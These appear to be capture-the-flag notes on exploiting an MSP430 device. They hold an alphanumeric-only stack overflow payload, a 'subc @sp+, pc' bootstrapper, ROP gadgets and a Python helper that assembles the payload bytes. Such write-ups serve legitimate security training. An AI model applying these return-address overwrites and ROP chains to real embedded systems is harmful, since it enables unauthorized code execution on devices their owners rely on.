; Goal: execute code from 0x25b6
; stack buffer: 0x43ed
; mem buffer:   0x2400

; Payload layout:
passwordpassword1[retval][pcoffset]0[realfunc][padding]0[bootstrapper]

retval       = 0x4430                        ; &bootstrapper (little-endian on the stack: 30 44 = "0D")
pcoffset     = (0x4430 + 2) - 0x2443 - 1 + C ; word popped by subc @sp+, pc, see below
padding      = "A"*0x30 + "1"                ; alignment
bootstrapper = subc @sp+, pc                 ; 30 71 = "0q"

; subc computes dst = dst - src - 1 + C, and pc already points past the 2-byte
; subc when it executes, so the popped word is subtracted FROM pc:
;   pcoffset = (retval + 2) - &realfunc - 1 + C
; (not &realfunc - retval). C is the carry flag at that moment.

'passwordpassword1' + '0D' + '??' + '0' + [realfunc][padding]0[bootstrapper]

bootstrapper:
    add @sp+, r15        ; 3f 51: 0x3f is not alphanumeric, only r0-r9 give a 0x30-0x39 low byte

realfunc:
    push #0x7f           ; 30 12 7f 00
    call #0x45fc         ; b0 12 fc 45

; Step 1: create a bootstrapper out of alphanumeric characters and store it on the stack.
; subc @sp+, pc pops a value off the stack and subtracts it from pc. Perfect for this:
    subc @sp+, pc        ; 30 71 = "0q"
b'passwordpassword1' + (b'\x30\x71' * 0x1a4) + b'00000000000000'

; code snippets (bytes in memory order, ASCII in quotes; n is the register number,
; so only r0-r9 give an alphanumeric byte 0x30-0x39):
; pop to register: 3n41 3041 = "nA0A"
    pop rN
    ret
; pop-and-add to register: 3n51 3041 = "nQ0A" (0x51 = add; 0x71 = "q" is subc @sp+, rN)
    add @sp+, rN
    ret
; pop sr: 3241 3041 = "2A0A"
    pop sr
    ret

; ROP gadgets:
; Pop sr (above)
; Move byte relative to r4 into r15: 0x4464 (little-endian on the stack: 64 44 = "dD")
    mov.b -0x4(r4), r15
    sxt r15
    add #0x8, sp
    pop r4
    ret
; Pop r4: 0x446c (little-endian on the stack: 6c 44 = "lD")
    pop r4
    ret

; chain: prefix + &pop_r4 + [word popped into r4] + &mov.b gadget
passwordpassword1 lD [r4] dD
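The encoding checks the notes above do by hand, as an added example that is not part of the original notes: a small helper that encodes MSP430 format-I instructions, shows which register choices survive an alphanumeric-only filter, packs stack addresses little-endian, and computes the word that `subc @sp+, pc` must pop to land on a chosen target. The addresses used (0x4430, 0x2443, 0x446c, 0x4464) are the ones in the notes and are not verified against any binary here; the r4 value 0x4141 in the demo chain is a placeholder.

```python
# Added example (not part of the original notes): helpers for building an
# alphanumeric-only MSP430 payload. Assumption: the addresses below are the
# ones written in the notes and are unverified here; 0x4141 is a placeholder
# for the word that `pop r4` consumes.
import struct

# Format-I (two-operand) opcodes, the high nibble of the instruction word.
OPCODES = {"mov": 0x4, "add": 0x5, "addc": 0x6, "subc": 0x7, "sub": 0x8,
           "cmp": 0x9, "dadd": 0xA, "bit": 0xB, "bic": 0xC, "bis": 0xD,
           "xor": 0xE, "and": 0xF}
PC, SP, SR = 0, 1, 2
AS_INDIRECT_AUTOINC = 3   # @Rn+ source addressing mode


def fmt1(op, src, dst, as_=0, ad=0, byte=False):
    """Encode a format-I instruction as the two bytes that sit in memory.

    Layout: opcode(4) | src(4) | Ad(1) | B/W(1) | As(2) | dst(4), little-endian."""
    word = ((OPCODES[op] << 12) | (src << 8) | (ad << 7) | (int(byte) << 6)
            | (as_ << 4) | dst)
    return struct.pack("<H", word)


def pop(reg):
    """pop rN is mov @sp+, rN."""
    return fmt1("mov", SP, reg, as_=AS_INDIRECT_AUTOINC)


def ret():
    """ret is pop pc."""
    return pop(PC)


def pop_into(op, reg):
    """add/subc/... @sp+, rN: pop a word and combine it into rN."""
    return fmt1(op, SP, reg, as_=AS_INDIRECT_AUTOINC)


def is_alnum(data):
    """True if every byte is ASCII [0-9A-Za-z]."""
    return all(c < 0x80 and chr(c).isalnum() for c in data)


def addr(a):
    """A 16-bit address as it is stored on the stack (little-endian)."""
    return struct.pack("<H", a)


def alnum_pop_regs():
    """Registers whose `pop rN` encoding is alphanumeric (low byte is 0x30+N)."""
    return [n for n in range(16) if is_alnum(pop(n))]


def subc_pc_word(instr_addr, target, carry):
    """Word that `subc @sp+, pc` located at instr_addr must pop to reach target.

    subc computes dst = dst - src - 1 + C and pc already points past the
    2-byte instruction, so src = (instr_addr + 2) - target - 1 + C."""
    return ((instr_addr + 2) - target - 1 + carry) & 0xFFFF


def build_rop(prefix, chain):
    """prefix followed by chain words little-endian; returns (payload, bad offsets)."""
    payload = prefix + b"".join(addr(w) for w in chain)
    bad = [i for i, c in enumerate(payload) if not is_alnum(bytes([c]))]
    return payload, bad


if __name__ == "__main__":
    print("subc @sp+, pc :", fmt1("subc", SP, PC, as_=AS_INDIRECT_AUTOINC))
    print("pop rN alnum  :", alnum_pop_regs())
    for op in ("add", "subc"):
        print(f"{op} @sp+, r4 :", pop_into(op, 4), " r15:", pop_into(op, 15))
    for c in (0, 1):
        w = subc_pc_word(0x4430, 0x2443, c)
        print(f"popped word C={c}: {w:#06x} -> {addr(w)!r} alnum={is_alnum(addr(w))}")
    # pop r4; ret  then the mov.b -0x4(r4), r15 gadget; 0x4141 fills the r4 slot.
    payload, bad = build_rop(b"passwordpassword1", [0x446c, 0x4141, 0x4464])
    print(payload, "non-alnum offsets:", bad)
```

Running it shows the two constraints that shape the notes: the low byte of `pop rN` / `add @sp+, rN` is 0x30+N, so only r0 to r9 encode as digits, and for the 0x4430 to 0x2443 jump the popped word is 0x1fee or 0x1fef depending on the carry, neither of which is alphanumeric.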